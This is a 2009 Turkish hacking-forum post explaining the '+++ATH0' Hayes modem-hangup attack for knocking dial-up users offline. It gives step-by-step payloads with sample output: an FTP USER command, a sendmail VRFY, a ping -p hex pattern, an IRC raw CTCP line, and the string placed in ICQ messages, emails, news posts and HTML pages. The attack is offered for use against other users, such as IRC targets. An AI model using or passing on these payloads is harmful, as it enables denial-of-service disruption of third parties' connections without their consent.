THT DUYURU

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.

chat
Seçenekler

modemin baglantısını kesme

Te@M_LiDeR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2009
Nereden:
RiZe
Mesajlar:
501
Konular:
243
Teşekkür (Etti):
129
Teşekkür (Aldı):
247
Ticaret:
(0) %
16-08-2009 01:23
#1
Lightbulb
modemin baglantısını kesme
modemin baglantisiniz kesme
Piyasadaki bir cok modem Hayes Komut Seti (ATZ, ATDT, ATH0..) kullanirlar.
Maalesef ki(?) bu tip modemler bazi ozel stringlerin i$lenmesine de izin verirler.
Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. i$te hikayenin ozu bu.

Bu attacktan tum modemler etkilenmez.
Ornegin U.S. Robotics, 33.6
(+++'dan hemen sonra bir anlik(=1 saniye) pause gerceklestirdiklerinden dolayi ATH0 devreye giremez)

Eger kendi modeminiz de bundan etkileniosa o zaman attack yapinca buyuk bir olasilikla sizin hattiniz hemen kopacaktir .
PPP, IP datagramI default olarak sIkI$tIrmadan gonderir o yuzden o stringi sizin modem elinden gecirir gecirmez aynen
okuyacagindan hat kesilme durumu gercekle$ir

Tipik attack ornekleri:

1) 21 portuna telnet ile:
elusive# telnet 199.99.99.99 21
Trying 199.99.99.99...
Connected to 192.168.1.1.
Escape character is '^]'.
220 abc FTP server (Version .............](1) Fri Apr 9
23:41:
USER +++ATH0
^]
telnet> close
Connection closed.
elusive# telnet 192.168.1.1 21
Trying 199.99.99.99...
telnet: Unable to connect to remote host: Network is unreachable
elusive#


2) sendmaile telnet ile baglanýn (qmail olunca olmuyor) ve "HELO orasi.com" yazýn orasi neresiyse baglaninca welcome vs diycektir..
sonra: VRFY +++ATH0
sana normal olarak $oyle dese de dial-up modem buyuk bir olasilikla koptu:
550 +++ATH0

3) ftp'ye baglanýn. USER +++ATH0 kullanýn.Diycektir ki:
331 Password required for +++ATH0
dese de iptal buyuk bi olasilikla(dial-up baglantisi oldugunu varsayiyoruz tabi).

4) IRC'deki karsinizdakine bi ICMP ECHO_REQUEST paketi gonderirseniz ki bu paket +++ATH0 icermeli,
ondan gelecek ICMP ECHO_RESPONSE paketi gonderdiginiz paket iceriginin aynisina sahip olacagindan karsidakine +++ATH0
yaptirmis olursunuz ve baglantisi kopar. Bunu nasil mi yapicaz?... bi program yazcaksin ;p

5) Linux'tan ping olayina gireriz : (-p pattern option'u linuxta var windows'ta olmaz)
(Ping modem killer ilk defa MrPhoenix (phoenix@iname.com) tarafindan bahsedilmi$tir.)

+++ATH0--> 2b2b2b415448300d (en sondaki 0d=13 biliyorsunuz enter)

#ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes

--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss

5 paket gitti..1-2 paket bazan yetmiyor(nedense??).

cali$madIgI durum:
# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms

--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 180.1/186.5/190.1 ms



peki ya e-mail? e-mailde de denedim ..mesaj kIsmIna +++ATH0 yazarsan
cok ilginc seyler olur. eger senin modem vulnerable ise senin hat kopar.
degilse..maili alan kisi alirken problem ya$ar.

ICQ Mesajýn icine ayný komutu yazýn. Karþý makine büyük olasýlýkla hattan düþecektir. (phyton)

Bu komutun yazý ile de olsa yazýlý olduðu bir htm dosyasýný upload etmeye calýþýn %90 baðlantýnýz kopacak. (phyton)

News serverda deneyin (Bunu denemedim) News servera bu komut iceren bir mesaj atýn. Mesajý okumak isteyenler düþecektir. (phyton)

IRC icin bir rivayete gore kar$I tarafIn +++ATH0 vermesi icin boyle oldugunu soyluyorlar..
Ben denedim kendi ustumde 1 defa cali$ti 15-20 denememde:
//raw NOTICE nickname : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)
yukarida satirda hic bir imla ya da yazim hatasI yoktur!.
(ba$ taraftaki iki tane slash da dahiL!)
SquaR Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler